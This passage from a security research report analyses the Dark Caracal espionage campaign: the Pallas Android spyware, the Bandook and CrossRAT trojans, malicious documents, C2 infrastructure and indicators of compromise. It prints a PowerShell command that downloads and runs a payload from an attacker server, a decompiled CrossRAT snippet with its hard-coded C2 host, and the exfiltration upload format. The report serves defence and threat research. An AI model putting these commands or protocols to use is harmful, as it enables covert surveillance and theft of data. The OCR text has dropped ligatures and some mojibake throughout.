488 Displays an alert with a phishing theme on a compromised device with the intention of stealing the victim’s credentials. Any entered credentials are sent to attacker servers.
489 PWS1
490 ac=PPWS uid=<Device_ID> PS=<victim’s credentials>
491 Checks the Android build on the device as well as the permissions of the app.
492 PRM1
493 If the installed Pallas sample is a trojanized version of Telegram, WhatsApp, Threema, or Primo, then retrieve their databases and, if present, associated keys.
494 WT1
495 Create a zip le of the shared_pref for the installed Pallas app and upload it to C2 infrastructure.
496 SHPR
497 ac=GTMBF
498TFX=<a string set by C2>
499 Manipulate Bitmap images, convert to JPG, and upload to C2.
500 SILF
501 Same operation as SILF but on a directory of images.
502 SIFO
503 ac=GTMBF
504TFX=<a string set by C2>
505 Split an attacker-speci ed le into chunks, saving them to external storage under the path .Temp/spd/.
506 SPLT1
507 ac=REPX uid=<Device_ID> RP=< leName> Splitted
508 Create a zip le of the contents of an attacker-speci ed directory and upload it to a C2 server.
509 ZDIR1
510 26
511
512 SECURITY RESEARCH REPORT
513 Pallas handles the ex ltrated data server-side via the upload.php script. This accepts HTTP POST requests that have the following headers and structure, where op_id speci es the type of le being uploaded.
514 POST
515Request properties
516Connection : Keep-Alive
517ENCTYPE : multipart/form-data
518Content-Type : multipart/form-data;boundary=*****
519Uploaded_ le : <abs_path_ le_on_victim_device> upload.php?test=<app_id>&op=<op_id>&rn=<>&extra=<>&extra2=<>[&FLS= <>&RLD=<>]
520--*****\r\n
521Content-Disposition: form-data; name=\â€uploaded_ le\â€; lename=\<abs_path_ le_on_victim>\\r\n \r\n
522<data_from_victim_to_upload>\r\n --*****--\r\n
523When Pallas receives the GALL1 instruction, it uploads ex ltrated data as a zip archive or saves it as a .db le. For most .db les, each line is base64 encoded and prepended with the string “*#@â€. When decoded, each line translates to a piece of ex ltrated data. Each piece of information is associated with a content keyword or data type. This can be represented as follows:
524<DataType><separator>[< eld><separator>...< eld><separator>]
52527
526
527 SECURITY RESEARCH REPORT
528 Analysis of all known Pallas samples seen to date has resulted in the identi cation of the following 10 data types:
529 Data
530 Data Type
531 Fields
532 Description
533 SMS
534A0X01
535 date address body
536id
537type
538 All SMS elds are set according to the Android SMS content provider documentation14 in which the address is the address of the other party and the type may be any of the following values:
539• “0†: ALL
540• “1â€: INBOX
541• “2â€: SENT
542• “3â€:â€DRAFT†• “4â€:OUTBOX • “5â€:FAILED
543• “6â€: QUEUED
544 Contacts
545 A0X02
546 Display_name
547Data1 Times_contacted Last_time_contacted
548 All contacts elds are set according to the Android ContactsContract documentation15.
549 Calls
550A0X03
551 Number Type Date Duration
552 All contacts elds are set according to the Android documentation for phone calls16 in which type is a string with
553any of the following values:
554• â€INCOMING†• â€OUTGOING†• “MISSEDâ€
555• â€nullâ€
556Date is in the standard Java SQL DATE format17.
557 Installed package
558 A0X04
559 Application_label Package_name Version_name Version_code
560 Speci es the list of installed packages on a victim’s device.
561 Browsing History
562 A0X05
563 Page_title Page_URL
564 Speci es the web pages a victim has visited.
565 14 https://developer.android.com/guide/topics/providers/content-provider-basics.html
56615 https://developer.android.com/reference/android/provider/ContactsContract.CommonDataKinds.Phone.html 16 https://developer.android.com/reference/android/provider/CallLog.Calls.html
56717 https://docs.oracle.com/javase/7/docs/api/java/sql/Date.html
56828
569
570 SECURITY RESEARCH REPORT
571 (continued from page 28)
572 Data
573 Data Type
574 Fields
575 Description
576 Bookmarks
577 A0X06
578 Bookmark_Title Bookmark_URL
579 Speci es the web pages a victim has bookmarked.
580 WiFi
581A0X07
582 SSID Capabilities Level Frequency BSSID
583 All the elds are de ned in Android scan result documentation18.
584 Accounts
585 A0X08
586 Name Type
587 Name is the account name of a victim and type is the authenticator name of that account.
588 Access Logs
589MIAMO
590 App_name App_path String1
591 Speci es a “.db†le that contains File and Directory access logs of
592a trojanized app. The “MIAMO†information line is always the rst line in such les. App_path is always a path that a Pallas sample has access to, for example, the SDCard or the application’s data folder.
593String1 is either set to “NO†or an absolute path.
594 Access Logs
595 D
596 Directory_path Directory_name
597 Directories that the app has accessed. Only exists in a le with “MIAMO†as the rst line.
598 Access Logs
599 F
600 File_path File_name File_length LasModi edTime
601 Files that the app has accessed. Only exists in a le with “MIAMOâ€
602as the rst line.
603 18 https://developer.android.com/reference/android/net/wi /ScanResult.html
60429
605
606 SECURITY RESEARCH REPORT
607 Previous Use of FinFisher Spyware
608In addition to the Pallas samples, we discovered a previously unreported FinFisher sample19 on the tweetsfb[.]com server. It is unclear whether this sample was a demo provided to this actor or if the actor came across it via other means.
609The date of package and compilation for this sample is 2014-03-27 17:26:14 UTC. Below is the extracted con guration and relevant details of this sample.
610 Title: Android Update
611Package Name: com.esn.wal
612SHA1: 835befd9376f90a12892876b482c1dcc39643a09 MD5: d965c3736e530bfdbfde2cc6a264f2aa
613 RequestID : 0
614 C2 Phone Added : +7820435193
615 MobileTargetUID : 0
616 VoicePhone Added : +7820944266
617 Version : 0
618 VoicePhone Added : +78235424312
619 MobileTargetID : nana
620 Logging : 0
621 HeartBeatInterval : 120
622 C2 : 180.235.133.57
623 TrojanID : nana
624 Ports: 21, 53, 443, 4111
625 TrojanUID : 03FDAF68
626 Included exploits - Exynos Abuse
627 UserID : 1000
628 Installed Modules
629• SMS
630• Phone log collection • Call recording
631• Device tracking
632 MaxInfections : 30
633 RemovalAtDate : 0
634 RemovalIfNoProxy : 0
635 19 https://en.wikipedia.org/wiki/FinFisher
63630
637
638 Surveillanceware - Desktop Components
639The desktop malware component exists in a range of le types, including executables, zip archives, PDFs, and Microsoft’s composite document le format. No zero days or publicly known exploits were located in these les and, based on several of the documents, the primary attack vector is believed to be social engineering via spear-phishing. Analysis into Dark Caracal’s desktop tooling did result in the discovery of a new cross-platform Java RAT known as CrossRAT and con rmed that this actor is using new variants of the Bandook family.
640Bandook
641The Bandook RAT was originally identi ed during EFF’s Operation Manul research, however, this investigation surfaced new variants belonging to this family. Written in Delphi and targeting Windows operating systems, Bandook samples are packed at multiple stages in order to both evade detection and slow down the process of reverse engineering by security analysts. At the time of writing, 19 out of 63 antivirus engines on the malware repository VirusTotal agged most Bandook samples as malicious.
642First stage samples of the version of Bandook used by Dark Caracal include what appears to be a drawing program and a trojanized version of the Psiphon circumvention software20. While the drawing application was not fully functional and did not provide a user interface when launched, the modi ed version of Psiphon contained the complete legitimate functionality of the original application.
643The rst stage malware is signed with a valid SSL certi cate issued by Certum CA for Ale Couperus (alecouperus@mail[.]com). We have identi ed several distinct samples signed with this certi cate. This suggests that the actors behind these samples control the private key for this certi cate and have the ability to sign arbitrary packages. It is unclear at this time whether the private key associated with this certi cate has been stolen or if the attackers obtained it via legitimate sources.
644Upon initial execution, the rst stage of Bandook decrypts several strings that are stored in the data section and base64 encoded. Below is the plaintext of some of these strings, which we can see as Windows API calls.
64520 SHA256 hash: ed25b0c20b1c1b271a511a1266fe3967ab851aaa9f793bdf4f3d19de1dcf6532
646SECURITY RESEARCH REPORT
647 31
648
649 Figure 25: Decoded strings from the Bandook sample
650The malware uses these API calls to decrypt Bandook’s second stage, an embedded resource. This resource is a randomly named eight-character string of uppercase letters and numbers. During our research, we only observed the numbers two and three being used and these were often positioned towards the end of the string. Following the decryption of the second stage, the iexplore.exe binary is started and immediately replaced with the loaded resource. This is a technique known as “process hollowing21â€.
651The second stage Bandook samples are occasionally packed with the following modi ed UPX packer “UPX Modi ed >> *$igBy Ahmed18â€. Not all second stages were packed indicating that the authors may be actively developing the malware. As expected, the core malicious functionality resides in the second stage, which attempts to implant itself in the system and contact command and control infrastructure for further instructions. At this point, the malware has the ability to start new processes, manipulate the le system and registry, take screen captures, escalate privileges, create mutexes, get system information, execute commands, get window names, and beacon to infrastructure.
65221 https://attack.mitre.org/wiki/Technique/T1093
653SECURITY RESEARCH REPORT
654 32
655
656 SECURITY RESEARCH REPORT
657 Bandook communication with attacker infrastructure takes place over a TCP port with HTTP payloads Base64 encoded and suf xed with the string “&&&â€. The following is an example of a decoded communication from an infected system:
658Instructions sent from Dark Caracal infrastructure to Bandook compromised systems make use of “~!†as a delimiter, the same approach used by the Pallas Android malware. This suggests there is a possibility Bandook and Pallas were written by the same author or that the author of one was inspired by the authors of the other. We found Bandook supports the following set of commands.
659 @0000~!18128~!192.168.1.82~!610930~!EFFuser~!Seven~!0d 0h 3m~!0~!4.1~!21/04/2017~!0~!0~!0~!0~!~!0~!0--~!None~!0~!
660 CaptureScreen
661 DeleteFileFromDevice
662 DeleteAutoFTPFromDB
663 Init
664 CopyMTP
665 ExecuteTV
666 ClearCred
667 ChromeInject
668 ExecuteAMMY
669 GetCamlist
670 DisableChrome
671 DDOSON
672 SendCam
673 RarFolder
674 ExecuteTVNew
675 StopCam
676 SendUSBList
677 getkey
678 Uninstall
679 SignoutSkype
680 SendMTPList
681 CompressArchive
682 StealUSB
683 SendMTPList2
684 GenerateReports
685 StartFileMonitor
686 GrabFileFromDevice
687 GetWi
688 SendFileMonLog
689 PutFileOnDevice
690 StartShell
691 GetUSBMONLIST
692 StopFileMonitor
693 GetSound
694 GetFileMONLIST
695 SendinfoList
696 SplitMyFile
697 StopUSBMonitor
698 EnableAndLoadCapList
699 GetAutoFTP
700 SearchMain
701 DisableMouseCapture
702 SendStartup
703 StopSearch
704 AddAutoFTPToDB
705 From this, we can infer some additional functionality, including the ability to view the victim’s webcam, record sound, get Wi-Fi connections, manipulate USB devices, manipulate the Chrome browser, sign the victim out of Skype, search for les, upload new les to the device, execute secondary infections, or participate in a DDOS attack.
706Systems infected with this Bandook variant contain a copy of the rst stage in the path C:\Users\user\AppData\ Roaming\%appname%\%appname%.exe. Similarly, in such cases, autostart registry keys are written with the same name as the dropped le to HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run.
70733
708
709 SECURITY RESEARCH REPORT
710 CrossRAT
711While investigating the axroot[.]com domain, we discovered a new remote access trojan called CrossRAT that we believe was developed by, or for, Dark Caracal. Written in Java with the ability to target Windows, Linux, and OSX, CrossRAT is able to manipulate the le system, take screenshots, run arbitrary DLLs for secondary infection on Windows, and gain persistence on the infected system.
712When executed in a Windows environment, CrossRAT attempts to copy itself to %AppData%\Local\ Temp\mediamgrs.jar before, like Bandook, creating an auto-start registry key in HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run with the name “mediamgrsâ€.
713On OSX and Linux, it attempts to write a copy of itself to /usr/var/mediamgrs.jar. If CrossRAT does not have suf cient permissions to write to this directory, it will fail back to the following path under the user’s home directory: $HOME/Library/mediamgrs.jar. For CrossRAT installations on OSX, a Launch Agent is created under $HOME/Library/ LaunchAgents/mediamgrs.plist to ensure that it will be launched again when the computer restarts. When on Linux, this persistence is achieved by writing an autorun le to $HOME/.con g/autostart/mediamgrs.desktop.
714CrossRAT performs communications to its C2 infrastructure via a TCP socket. The following is an example of content sent over the wire from a compromised machine:
715CrossRAT uses a similar structure to Pallas and Bandook when communicating with infrastructure. Speci cally, it uses &&& to terminate the response string and uses @### to start command strings.
716Below is a code snippet from a CrossRAT sample. The response pre xes, hard coded C2 server of exberry[.]com, and xed port of 2223, are clearly visible.
717 5287249f-caa2-4b66-850c-49eedd46cf47$#@@0000$#@192.168.1.16$#@Windows 7$#@6.1$#@EFFuser^585948$#@0.1$#@GROUP2$#@&&&
718 public nal class k
719{
720public static boolean a = false;
721// Hardcoded C2 Information
722public static String b = “ exberry.comâ€; // C2 Server public static int c = 2223; // C2 Port
72334
724
725 SECURITY RESEARCH REPORT
726 (continued from page 34)
727 public static String d = “$#@â€; // Argument delimiter
728public static String e = “^!@â€; // delimiter within arguments public static UUID f;
729public static String g;
730public static Preferences h;
731public static String i = “0.1â€; // Version Number
732public static String j = “GROUP2â€; // Campaign name
733public static Socket k;
734public static Socket l;
735// Server command pre xes
736public static String m = “@0000â€; // Enumerate root directories on the system. 0 args public static String n = “@0001â€; // Enumerate les on the system. 1 arg
737public static String o = “@0002â€; // Create blank le on system. 1 arg
738public static String p = “@0003â€; // Copy File. 2 args
739public static String q = “@0004â€; // Move le. 2 args
740public static String r = “@0005â€; // Write le contents. 4 args
741public static String s = “@0006â€; // Read le contents. 4 args
742public static String t = “@0007â€; // Heartbeat request. 0 args
743public static String u = “@0008â€; // Get screenshot. 0 args
744public static String v = “@0009â€; // Run a DLL (windows only). 1 arg
745// Client response pre xes
746public static String w = “@0000â€; // client hello
747public static String x = “@0001â€; // heartbeat response
748public static String y = “@0002â€; // List of system root directories
749public static String z = “@0003â€; // Status message for le manager connect, unimplemented public static String A = “@0004â€; // Status message for le manager connect, unimplemented public static String B = “@0005â€; // List of les on system
750public static String C = “@0006â€; // End list of les on system
751public static String D = “@0007â€; // le created status message
752public static String E = “@0008â€; // le written status message
753public static String F = “@0009â€; // le moved status message
754public static String G = “@0010â€; // le write status
755public static String H = “@0011â€; // le read status and le contents
756public static String I = “@0012â€; // send screenshot contents
757public static String J = “@0013â€; // Run DLL status message
758public static String K; // Filepath for CrossRAT
759Analysis of CrossRAT shows that it has a version number of 0.1, which indicates that its malicious capabilities are still under development. Implemented functionality includes the ability to enumerate attacker-speci ed directories, copy / move / read les, beacon to C2 infrastructure, run attacker speci c libraries (Windows only), and create empty les. The CrossRAT sample we discovered was last modi ed in March of 2017.
76035
761
762 Infected Documents
763We identi ed several Word documents which appear to be intended for use as infection vectors in phishing attacks. None of the documents appear to contain any exploits, but rather rely on macros to run malicious code on a target system. If executed in an environment that has macros enabled, the malware downloads its second stage components. We saw this same process in numerous malicious PDF les that used javascript to download secondary stages. The following script is an example of this functionality, which is identical to the malicious Word doc with the SHA256 hash e5eeb0a46dac58b171ebcefec60e9ff351fc7279d95892c6f48f799a1a364215 (Word macro xed.doc).
764SECURITY RESEARCH REPORT
765 var v = app.viewerVers, ion; if (v < 7) {
766var n = 0;
767if (this.dataObjects != null) n = this.dataObjects.length;
768if (v >= 5 && v < 6 && n > 0 && (app.viewerVariation == “Full†|| app.viewerVariation ==
769“Fill-Inâ€)) {
770if (this.external\) app.alert(“This document has le attachments. To view the
771attachments, click the Save button to save a copy of the document, open the copy in Acrobat, and use the File > Document Properties > Embedded Data Objects menu.â€, 3, 0);
772else app.\alert(“This document has le attachments. Use the File > Document Properties > Embedded Data Objects menu to view the attachments.â€, 3, 0);
773} else if (v >= 6 && v < 7) { if (n == 0) {
774var np = this.numPages; syncAnnotScan();\
775for (var p = 0; p < np && n == 0; ++p) {
776var annots = this.getAnnots(p); if (annots != null) {
777for (var i = 0; i < annots.length; ++i) {
778if (annots[i].type == “FileAttachmentâ€) {
779n = 1;\
780break; }
781} }
782} }
783if (n > 0) {
784if (this.external) app.alert(“This document has le attachments. To view the
785attachments, click the black triangle at the top of the document window’s vertical scrollbar and \
786choose File Attachments.â€, 3, 0);
787else app.alert(“This document has le attachments. Use the Document > File Attachments menu to view the attachments.â€, 3, 0);
788} }
789}
790---
791this.exportDataObject({ cName: “BL920123.docâ€, nLaunch: 2 });
79236
793
794 Figure 26: An observed malicious Word le that, when executed, attempts to run macros in order to download and execute Bandook stage one
795Other Samples
796Surprisingly, we also observed a malicious Microsoft Compiled HTML Help le with the .chm extension. Primarily used for software documentation, .chm les were rst introduced with the release of Window 98. However, they are still supported in Windows 7. The chm le attempts to execute a command via Powershell that downloads an additional le called ne.abc from the server cma-cgrm[.]com. Below is the command contained in the malicious .chm le.
797SECURITY RESEARCH REPORT
798 cmd.exe,/c powershell.exe -ExecutionPolicy bypass -nopro le -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘https://cma- cgrm[.]com/ebusiness/ne.abc’,’%TEMP%\chmplg.exe’);Start-Process %TEMP%\chmplg.exe;
799At the time of analysis, this server was no longer live and, as such, the associated ne.abc binary has not yet been acquired and does not appear on VirusTotal. The cma-cgrm[.]com domain is not obviously connected with other infrastructure.
80037
801
802 SECURITY RESEARCH REPORT
803 Infrastructure
804While analyzing adobeair[.]net, we uncovered sprawling infrastructure used by Dark Caracal. This infrastructure serves a broad set of purposes, including acting as storage for ex ltrated data, masquerading as an Android App Store hosting malware, delivering attacker commands to infected devices, and providing phishing content aimed at gathering credentials for various well known services.
805We found much of this infrastructure hosted on servers provided by Shinjiru, an offshore bulletproof hosting provider that allows its customers to host almost any content. WHOIS information listed for the adobeair[.]net C2 server led to the discovery of many of these domains, as did scanning of Shinjiru IP blocks for servers running a set of services. This acted as a ngerprint for Dark Caracal’s infrastructure. To date, the following domains and IPs have been identi ed as connected to the infrastructure used
806by Dark Caracal.
807 Domain
808 Links / Connection to Dark Caracal
809 adobeair[.]net
810 Shared C2 server / Ex ltrated data server
811 secureandroid[.]info
812 Blackmarket “Android App Storeâ€
813 tweetsfb[.]com
814 Watering hole, Facebook groups, used to phish credentials, running Apache Win32
815 fbarticles[.]com
816 Phishing domain linked by WHOIS (op13)
817 Arablivenews[.]com [EXPIRED]
818 WHOIS (op13)
819 Nancyrazzouk[.]com [EXPIRED]
820 WHOIS (nancyrazzouk)
821 Arabpublisherslb[.]com
822 WHOIS (nancyrazzouk)
823 exberry[.]com
824 94[.]229[.]70[.]7 (Windows)
825 planethdx[.]com
826 94[.]229[.]70[.]7 (Windows)
827 globalmic[.]net
828 94[.]229[.]70[.]7 (Windows)
829 megadeb[.]com
830 94[.]229[.]70[.]7 (Windows)
831 opwalls[.]com
832 94[.]229[.]70[.]7 (Windows)
833 mecodata[.]com
834 94[.]229[.]70[.]7 (Windows)
835 sabisint[.]com
836 94[.]229[.]70[.]7 (Windows)
837 roxsoft[.]net
838 94[.]229[.]70[.]7 (Windows)
839 axroot[.]com
840 Windows malware campaign
841 skypeupdate[.]com
842 Windows malware campaign
843 playermea[.]com
844 Windows malware campaign
845 kaliex[.]net
846 Windows malware campaign
847 tenoclock[.]net
848 Windows malware campaign
849 ancmax[.]com
850 Windows malware campaign
851 38
852
853 SECURITY RESEARCH REPORT
854 The following relevant contact information has also been identi ed during this investigation.
855 Email
856 Link/Context
857 op13@mail[.]com
858 Primary email contact for C2 server. Associated with “rami jabbour†“Hadi Maz
859 nancyrazzouk@mail[.]com
860 nancyrazzouk
861 hicham.dika@mail[.]com
862 SSL cert in exe
863 hetemramadani5@gmail.com
864 SSL cert in exe
865 alecouperus@mail.com
866 SSL cert in exe
867 Primary Command and Control Server
868As noted, adobeair[.]net is hosted on Shinjiru. This bulletproof hosting company allows its customers to host almost any type of content, protects client identity, accepts Bitcoin for payment, and is more resilient than other providers to takedowns22. Shinjiru has also been used to host many of the Dark Caracal Windows domains dating back over seven years to April 27th, 2010
869(see a list of Windows malware domains in the Windows infrastructure section below).
870At the time of writing, adobeair[.]net is currently live and running a fairly unique set of services. We have used this server as a ngerprint in the discovery of further related infrastructure. These services include XAMPP for Windows 5.6.31, Apache 2.4.26, MariaDB 10.1.25, PHP 5.6.31, phpMyAdmin 4.7.0, and OpenSSL 1.0.2. We con rmed these via an nmap scan of the adobeair server.23
871 Figure 27: Nmap scan of adobeair[.]net
87222 https://www.shinjiru.com/company/about-us/ 23 https://www.apachefriends.org/download.html
87339
874
875 SECURITY RESEARCH REPORT
876 The adobeair[.]net C2 server had the Apache mod_status module enabled. This provides operators with information on server activity, performance, and a statistics page under /server-status that details connected clients and the server resources they are accessing. By programmatically monitoring this page, we were able to determine the source IPs of infected clients and admins logging into the console.
877The adobeair[.]net server has, as of late September 2017, been moved to a new hosting provider, M247, and the operators have improved the security.
878WHOIS history for adobeair[.]net lists Nancy Razzouk with an email address of op13@mail[.]com as the registrant. We have identi ed the “Nancy Razzouk†persona as the SSL signer of the Windows malware samples and the registrant of multiple domains. Its reuse has helped identify further Dark Caracal infrastructure.
879 Figure 28: WHOIS information for adodeair[.]net as observed in August 2017
88040
881
882 SECURITY RESEARCH REPORT
883 Watering Hole Server
884During this investigation, we determined this server is the only infrastructure we discovered that serves up malicious apps belonging to the Pallas malware family. A detailed analysis of these applications can be found under the Android Surveillanceware section. As with other Dark Caracal infrastructure, the secureandroid[.]info domain was also registered with the bulletproof hosting company Shinjiru.
885Figure 29: Screenshot of the secureandroid[.]info watering hole server, a distribution point for Pallas
886We found links to these landing pages in the ex ltrated content of compromised devices, which indicates it is actively being used during the attack chain. As of December 2017 it appears that secureandroid[.]info has had its domain expire.
887Phishing Domains
888We identi ed the Dark Caracal domain tweetsfb[.]com while analyzing the secureandroid[.]info server source code. We identi ed two bit[.]ly URLs on this server that resolve to other pages on the tweetsfb site that were carefully crafted to look like the Facebook and Twitter login portals. The copyright dates suggest these pages are clones of the originals from 2015.
889 Figure 30: Dark Caracal clones of Twitter and Facebook login portals
89041
891
892 SECURITY RESEARCH REPORT
893 These bit[.]ly links and their respective resolving links are:
894• http://bit[.]ly/2j3r285 points to http://www.tweetsfb[.]com/services/100001472583690/twitter/articles/100001/
895• http://bit[.]ly/2iByHcu points to http://tweetsfb[.]com/services/100001472583690/facebook/groups/100002/
896The tweetsfb[.]com domain was found to share an IP address (172.94.17.147) with the following additional domains.
897 Figure 31: Domains sharing the same IP address as tweetsfb[.]com
898We were able to nd additional phishing campaigns in VirusTotal that referenced fbarticles[.]com. While fbarticles was registered by the op13@mail[.]com address with the name “Hadi Mazeh,†the WHOIS information for fbtweets was private.
899 Figure 32: Detections in VirusTotal for fbarticles[.]com
90042
901
902 SECURITY RESEARCH REPORT
903 Figure 33: Detections in VirusTotal for the IP address that hosted fbarticles[.]com
904Note: we identi ed three further domains — “facebookservices[.]orgâ€, “gmailservices[.]orgâ€, and “twiterservices[.]org†that were
905once a part of this campaign. Those domains now appear to be sinkholed.
906When we discovered these domains, the threat actors had already taken them of ine and another individual had purchased them. This individual is associated with unrelated domains that are connected to other APT reports. However, we noticed that the individual purchased the domains after the APT reports went public. While we’re not sure why this individual is purchasing, sinkholing, and monitoring these domains, we think it’s an interesting note.
90743
908
909 SECURITY RESEARCH REPORT
910 Windows C2 Servers
911The Windows server infrastructure has a much longer history than the Android infrastructure, showing that the actors are willing to evolve to new technologies, such as mobile, as they become more valuable targets.
912The Windows malware servers hosted control panels for multiple campaigns using various malware that included IRIS RAT, Bandook, and Arcom RAT. We found these servers hosting ex ltrated desktop content, Windows malware signed by “alecouperus@mail[.]comâ€, and the CrossRAT trojan.
913All of these domains share the same IP on more than one occasion and have migrated between hosting providers in the same time window. Most of these domains were hosted on Shinjiru, the same hosting server for the Android campaign.
914 ancmax[.]com planethdx[.]com mecodata[.]com globalmic[.]net kaliex[.]net axroot[.]com
915 sabisint[.]com megadeb[.]com roxsoft[.]net exberry[.]com opwalls[.]com
916 The following screenshot shows HTTP 200 OK response codes for http://<server>/<Payload>/ Each of the following directories contained a login panel for either IRIS RAT or Arcom RAT.
917 Figure 34: Various RAT login portals found on a mix of the C2 servers
91844
919
920 Using the Wayback Machine we identi ed the signature Win32 apache server running on skypeupdate[.]com in 2016. This server was rst seen resolving to an IP belonging to Shinjiru in late 2013 and last seen resolving to a Shinjiru IP in late 2016.
921The oldest domain we identi ed as part of this infrastructure is exberry[.]com. The following screenshot shows passive DNS resolution dating back to 2010.
922Figure 35: Passive DNS resolutions for the infrastructure
923SECURITY RESEARCH REPORT
924 45
925
926 SECURITY RESEARCH REPORT
927 Appendix
928Indicators of Compromise and Actor Tracking
929 IOC
930 Email
931 op13@mail[.]com
932 hicham.dika@mail[.]com
933 nancyrazzouk@mail[.]com
934 alecouperus@mail[.]com
935 hetemramadani5@gmail.com
936 info@secureandroid[.]info
937 IP
938 111.90.141[.]70
939 111.90.145[.]64
940 111.90.141[.]38
941 111.90.158.121
942 111.90.141.169
943 111.90.145.64
944 111.90.150.221
945 180.235.133.57
946 172.111.250.156
947 77.78.103.41
948 74.208.167[.]252
949 111.90.140[.]11
950 111.90.150[.]221
951 Phone Number
952 +7820435193
953 +7820944266
954 +7820944266
955 Domain
956 adobeair[.]net
957 tweetsfb[.]com
958 secureandroid[.]info
959 fbtweets[.]net
960 gsec[.]in
961 arabpublisherslb[.]com
962 sabisint[.]com
963 fbarticles[.]com
964 planethdx[.]com
965 opwalls[.]com
966 kaliex[.]net
967 axroot[.]com
968 megadeb[.]com
969 mecodata[.]com
970 roxsoft[.]net
971 exberry[.]com
972 globalmic[.]net
973 playermea[.]com
97446
975
976 (continued from page 46)
977SECURITY RESEARCH REPORT
978 arablivenews[.]com
979 ecowatchasia[.]com
980 etn9[.]com
981 ancmax[.]com
982 tenoclock[.]net
983 kaliex[.]net
984 mangoco[.]net
985 jaysonj.no-ip[.]biz
986 orange2015[.]net
987 skypeservice.no-ip[.]org
988 accountslogin[.]services
989 adobeinstall[.]com
990 adobe- ashviewer.accountslogin[.]services
991 dropboxonline[.]com
992 iceteapeach[.]com
993 nvidiaupdate[.]com
994 skypeupdate[.]com
995 paktest.ddns[.]net
996 watermelon2017[.]com
997Mobile Implant Apps
998 IOC
999 Type
1000 PackageName
1001 b0151434815f8b3796ab83848bf6969a2b2ad721
1002 SHA1
1003 com.primo.mobile.android.app
1004 bfbe5218a1b4f8c55eadf2583a2655a49bf6a884
1005 SHA1
1006 org.thoughtcrime.securesms
1007 47243997992d253f7c4ea20f846191697999cd57
1008 SHA1
1009 com.psiphon3
1010 ed4754effda466b8babf87bcba2717760f112455
1011 SHA1
1012 com.gbwhatsapp
1013 309038fceb9a5eb6af83bd9c3ed28bf4487dc27d
1014 SHA1
1015 org.telegram.plus
1016 eaed6ce848e68d5ec42837640eb21d3bfd9ae692
1017 SHA1
1018 org.torproject.android
1019 edf037efc400ccb9f843500103a208fe1f254453
1020 SHA1
1021 org.telegram.plus
1022 35b70d89af691ac244a547842b7c8dfd9a7233fe
1023 SHA1
1024 ch.threema.app
1025 7d47da505f8d3ee153629b373f6792c8858f76e8
1026 SHA1
1027 com. ashplayer.player
1028 4896b0c957b6a985b2b6efe2ffe517dceaa6ce01
1029 SHA1
1030 com. ashplayer.player
1031 6a2d5c0a4cc5b5053f5c8f15c447316fae66b57b
1032 SHA1
1033 com. ashplayer.player
1034 47
1035
1036 SECURITY RESEARCH REPORT
1037 Desktop Implant Apps
1038 SHA2 Sum
1039 File Type
1040 ce583821191345274cd954b2db7da9742c239fe413fc17dcb97f fdd7b51cb072
1041 MS Windows HtmlHelp Data
1042 ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2
1043 PE32 executable (DLL) (GUI) Intel 80386
1044 26419a0b6e033cdcb7bf4ca6b0b24fda35490cc6f2796682fb9403620f63d428
1045 PE32 executable (GUI) Intel 80386
1046 15af5bbf3c8d5e5db41fd7c3d722e8b247b40f2da747d5c334f7fd80b715a649
1047 Zip archive data
1048 22eee43887e94997f9f9786092ffd3a9b51f059924cba678cf7b62cfafa65b28
1049 PE32 executable (GUI) Intel 80386
1050 fcf8f9566868d65d901fd6db9a8d6decacb860f5595f84a6a878193eda11549d
1051 PDF document, version 1.6
1052 f2178146741f91923c7d3e2442bd08605ed5a0927736e8cfdea00c055b2c6284
1053 PDF document, version 1.6
1054 6b6d363d653785f420dcc1a23c9d9b8b76b8647209b52562b774c793dc0e3f6b
1055 data
1056 a3ae05a134b30b8c8869d0acd65ed5bca160988b404c146a325f2399b9c1a243
1057 PE32 executable (DLL) (GUI) Intel 80386
1058 e5eeb0a46dac58b171ebcefec60e9ff351fc7279d95892c6f48f799a1a364215
1059 Composite Document File V2 Document
1060 400bca713ba1def9cdbc0e84fc97447db2fa3d12b1c5ef352ef985b7787b6ca4
1061 Microsoft Word 2007+
1062 5e0d061531071e53b3b993e06ce20dae6389a7e9eba5d7887399de48e2f2d278
1063 Composite Document File V2
1064 f9f2e632535b214a0fab376b32cbee1cab6507490c22ba9e12cfa417ed8d72bb
1065 MS-DOS executable
1066 bf600e7b27bdd9e396e5c396aba7f079c244bfb92ee45c721c2294aa36586206
1067 PE32 executable (GUI)
1068 da81aec00b563123d2fbd14fb6a76619c90f81e83c5bd8aa0676922cae96b9ad
1069 PE32 executable (GUI) Intel 80386
1070 9cf3d3c0b790cebeacb8cb577cd346a6513b1b74fa120aff8984aa022301562e
1071 PE32 executable (DLL) (GUI) Intel 80386
1072 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b
1073 PE32 executable (GUI) Intel 80386
1074 a91c2cad20935a85d6eed72ef663254396914811f043018732d29276424a9578
1075 PE32 executable (GUI) Intel 80386
1076 b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d
1077 PE32 executable (GUI) Intel 80386
1078 ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790
1079 PE32 executable (GUI) Intel 80386
1080 5c1622cabf21672a8a5379ce8d0ee0ba6d5bc137657f3779faa694fcc4bb3988
1081 PE32 executable (GUI) Intel 80386
1082 86f1bbda3ebf03a0f0a79d7bd1db68598ace9465f5cebb7f66773f8a818b4e8b
1083 PE32 executable (DLL) (GUI) Intel 80386
1084 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd
1085 PE32 executable (DLL) (GUI) Intel 80386
1086 e d 2 5 b 0 c 2 0 b 1 c 1 b 2 7 1 a 5 11 a 1 2 6 6 f e 3 9 6 7 a b 8 5 1 a a a 9 f 7 9 3 b d f 4 f 3 d 1 9 d e 1 d c f 6 5 3 2
1087 PE32 executable (GUI) Intel 80386
1088 f581a75a0f8f8eb200a283437bed48f30ae9d5616e94f64acfd93c12fcef987a
1089 PE32 executable (GUI) Intel 80386
1090 d57701321f2f13585a02fc8ba6cbf1f2f094764bfa067eb73c0101060289b0ba
1091 PE32 executable (GUI) Intel 80386
1092 48
1093
1094 About Lookout
1095Lookout is a cybersecurity company for a world run by apps. Powered by the largest dataset of mobile code in existence, Lookout is the security platform of record for mobile device integrity and data access. Lookout is trusted by hundreds
